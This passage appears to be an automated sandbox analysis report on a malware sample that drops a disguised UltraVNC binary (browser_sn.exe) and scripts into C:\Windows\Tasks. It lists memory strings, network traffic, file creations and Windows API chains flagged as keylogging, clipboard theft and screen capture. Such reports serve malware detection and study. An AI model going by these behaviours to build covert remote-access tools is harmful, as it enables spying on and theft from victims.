0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	String found in binary or memory: http://www.uvnc.com
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	String found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
Source: 2D85F72862B55C4EADD9E66E06947F3D0.15.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: ReaderMessages.11.dr	String found in binary or memory: https://www.adobe.co

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe

Code function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,00000000

0_2_00408630

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C31AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,

24_2_00007FF790C31AE0

Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C613A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	24_2_00007FF790C613A0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C31DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	24_2_00007FF790C31DD0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C613A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	28_2_00007FF790C613A0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C31DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	28_2_00007FF790C31DD0

Source: C:\Windows\Tasks\browser_sn.exe

24_2_00007FF790C31AE0

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C5F980 EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,ReleaseDC,DeleteDC,CreateDCA,EnumDisplaySettingsA,FreeLibrary,EnumWindows,GetDC,CreateCompatibleDC,GetLastError,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetLastError,GetDIBits,GetDIBits,GetDeviceCaps,InvalidateRect,

24_2_00007FF790C5F980

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C531B0 GetKeyboardState,

24_2_00007FF790C531B0

Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,		24_2_00007FF790C474C0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,		28_2_00007FF790C474C0

Source: C:\Windows\Tasks\browser_sn.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C42E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

24_2_00007FF790C42E40

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C4A130 GetVersionExA,OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,OpenProcess,OpenProcessToken,CloseHandle,GetModuleFileNameA,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,OpenEventA,SetEvent,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,OpenEventA,SetEvent,GetModuleFileNameA,GetDesktopWindow,ShellExecuteA,InitializeCriticalSection,Sleep,SetThreadDesktop,CloseDesktop,

24_2_00007FF790C4A130

Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	24_2_00007FF790C434B0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C43550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	24_2_00007FF790C43550
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	28_2_00007FF790C434B0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C43550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	28_2_00007FF790C43550

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\3889122.Khe9oLY	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\9655269573	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\DygIR.vkc0f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\go3uE.OUJMA	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\uqVb3.kkb9h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Xv6Ya.d8LhT	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\9655269573.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\3889122.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\browser_sn.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\UltraVNC.ini	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to behavior

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_00405721	0_2_00405721
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_004139D1	0_2_004139D1
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_00413AAB	0_2_00413AAB
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_00413370	0_2_00413370
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_00413D43	0_2_00413D43
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_0040AD30	0_2_0040AD30
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C536D0	24_2_00007FF790C536D0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C379E9	24_2_00007FF790C379E9
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CF09F0	24_2_00007FF790CF09F0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C34200	24_2_00007FF790C34200
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C381AD	24_2_00007FF790C381AD
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C3E1D0	24_2_00007FF790C3E1D0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C551B7	24_2_00007FF790C551B7
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C35170	24_2_00007FF790C35170
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5F980	24_2_00007FF790C5F980
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C48980	24_2_00007FF790C48980
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C46930	24_2_00007FF790C46930
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4A130	24_2_00007FF790C4A130
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5D150	24_2_00007FF790C5D150
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5AB10	24_2_00007FF790C5AB10
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C37B04	24_2_00007FF790C37B04
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C37A9A	24_2_00007FF790C37A9A
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C37ACF	24_2_00007FF790C37ACF
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CA12C0	24_2_00007FF790CA12C0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5C2C0	24_2_00007FF790C5C2C0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C40270	24_2_00007FF790C40270
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C32270	24_2_00007FF790C32270
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C58A70	24_2_00007FF790C58A70
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C37A5B	24_2_00007FF790C37A5B
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C33A90	24_2_00007FF790C33A90
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C55A33	24_2_00007FF790C55A33
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C37A1C	24_2_00007FF790C37A1C
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CE7250	24_2_00007FF790CE7250
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5623E	24_2_00007FF790C5623E
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C37BE2	24_2_00007FF790C37BE2
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C493E0	24_2_00007FF790C493E0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C44C10	24_2_00007FF790C44C10
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CEE400	24_2_00007FF790CEE400
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5739B	24_2_00007FF790C5739B
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C37BA6	24_2_00007FF790C37BA6
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4B3D0	24_2_00007FF790C4B3D0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C56BBD	24_2_00007FF790C56BBD
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C37B71	24_2_00007FF790C37B71
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C47B90	24_2_00007FF790C47B90
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C34390	24_2_00007FF790C34390
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4BB80	24_2_00007FF790C4BB80
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C60330	24_2_00007FF790C60330
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C37B37	24_2_00007FF790C37B37
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C3DCF0	24_2_00007FF790C3DCF0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5DCF0	24_2_00007FF790C5DCF0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C61CE0	24_2_00007FF790C61CE0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C41D10	24_2_00007FF790C41D10
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C654A0	24_2_00007FF790C654A0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C65CA0	24_2_00007FF790C65CA0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C52CC0	24_2_00007FF790C52CC0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CF2C70	24_2_00007FF790CF2C70
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C63460	24_2_00007FF790C63460
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CF8C90	24_2_00007FF790CF8C90
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5A420	24_2_00007FF790C5A420
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C48E10	24_2_00007FF790C48E10
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4E610	24_2_00007FF790C4E610
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4C5B0	24_2_00007FF790C4C5B0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C31DD0	24_2_00007FF790C31DD0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C56DD1	24_2_00007FF790C56DD1
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C48590	24_2_00007FF790C48590
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C54D7E	24_2_00007FF790C54D7E
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4AD30	24_2_00007FF790C4AD30
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5AE70	24_2_00007FF790C5AE70
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C61660	24_2_00007FF790C61660
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CF068C	24_2_00007FF790CF068C
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C34E80	24_2_00007FF790C34E80
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C63E20	24_2_00007FF790C63E20
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C51620	24_2_00007FF790C51620
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C52650	24_2_00007FF790C52650
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C80650	24_2_00007FF790C80650
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C3C810	24_2_00007FF790C3C810
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C33770	24_2_00007FF790C33770
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4AF60	24_2_00007FF790C4AF60
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CEDF80	24_2_00007FF790CEDF80
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5E780	24_2_00007FF790C5E780
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C49740	24_2_00007FF790C49740
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C420E0	24_2_00007FF790C420E0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C3A910	24_2_00007FF790C3A910
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C41100	24_2_00007FF790C41100
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C470B0	24_2_00007FF790C470B0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4C8D0	24_2_00007FF790C4C8D0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5A870	24_2_00007FF790C5A870
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4A890	24_2_00007FF790C4A890
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C4C090	24_2_00007FF790C4C090
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C31880	24_2_00007FF790C31880
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C379E9	28_2_00007FF790C379E9
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CF09F0	28_2_00007FF790CF09F0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C34200	28_2_00007FF790C34200
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C381AD	28_2_00007FF790C381AD
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C3E1D0	28_2_00007FF790C3E1D0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C551B7	28_2_00007FF790C551B7
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C35170	28_2_00007FF790C35170
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5F980	28_2_00007FF790C5F980
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C48980	28_2_00007FF790C48980
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C46930	28_2_00007FF790C46930
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4A130	28_2_00007FF790C4A130
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5D150	28_2_00007FF790C5D150
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5AB10	28_2_00007FF790C5AB10
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C37B04	28_2_00007FF790C37B04
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C37A9A	28_2_00007FF790C37A9A
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C37ACF	28_2_00007FF790C37ACF
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CA12C0	28_2_00007FF790CA12C0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5C2C0	28_2_00007FF790C5C2C0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C40270	28_2_00007FF790C40270
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C32270	28_2_00007FF790C32270
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C58A70	28_2_00007FF790C58A70
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C37A5B	28_2_00007FF790C37A5B
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C33A90	28_2_00007FF790C33A90
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C55A33	28_2_00007FF790C55A33
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C37A1C	28_2_00007FF790C37A1C
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CE7250	28_2_00007FF790CE7250
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5623E	28_2_00007FF790C5623E
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C37BE2	28_2_00007FF790C37BE2
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C493E0	28_2_00007FF790C493E0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C44C10	28_2_00007FF790C44C10
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CEE400	28_2_00007FF790CEE400
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5739B	28_2_00007FF790C5739B
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C37BA6	28_2_00007FF790C37BA6
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4B3D0	28_2_00007FF790C4B3D0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C56BBD	28_2_00007FF790C56BBD
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C37B71	28_2_00007FF790C37B71
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C47B90	28_2_00007FF790C47B90
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C34390	28_2_00007FF790C34390
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4BB80	28_2_00007FF790C4BB80
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C60330	28_2_00007FF790C60330
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C37B37	28_2_00007FF790C37B37
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C3DCF0	28_2_00007FF790C3DCF0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5DCF0	28_2_00007FF790C5DCF0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C61CE0	28_2_00007FF790C61CE0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C41D10	28_2_00007FF790C41D10
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C654A0	28_2_00007FF790C654A0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C65CA0	28_2_00007FF790C65CA0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CF2C70	28_2_00007FF790CF2C70
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C63460	28_2_00007FF790C63460
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CF8C90	28_2_00007FF790CF8C90
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5A420	28_2_00007FF790C5A420
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C52DF3	28_2_00007FF790C52DF3
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C48E10	28_2_00007FF790C48E10
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4E610	28_2_00007FF790C4E610
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4C5B0	28_2_00007FF790C4C5B0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C31DD0	28_2_00007FF790C31DD0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C56DD1	28_2_00007FF790C56DD1
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C48590	28_2_00007FF790C48590
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C54D7E	28_2_00007FF790C54D7E
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4AD30	28_2_00007FF790C4AD30
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C536D0	28_2_00007FF790C536D0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5AE70	28_2_00007FF790C5AE70
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C61660	28_2_00007FF790C61660
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CF068C	28_2_00007FF790CF068C
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C34E80	28_2_00007FF790C34E80
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C63E20	28_2_00007FF790C63E20
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C51620	28_2_00007FF790C51620
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C52650	28_2_00007FF790C52650
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C80650	28_2_00007FF790C80650
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C3C810	28_2_00007FF790C3C810
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C33770	28_2_00007FF790C33770
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4AF60	28_2_00007FF790C4AF60
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CEDF80	28_2_00007FF790CEDF80
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5E780	28_2_00007FF790C5E780
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C49740	28_2_00007FF790C49740
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C420E0	28_2_00007FF790C420E0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C3A910	28_2_00007FF790C3A910
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C41100	28_2_00007FF790C41100
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C470B0	28_2_00007FF790C470B0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4C8D0	28_2_00007FF790C4C8D0
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5A870	28_2_00007FF790C5A870
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C4A890	28_2_00007FF790C4A890
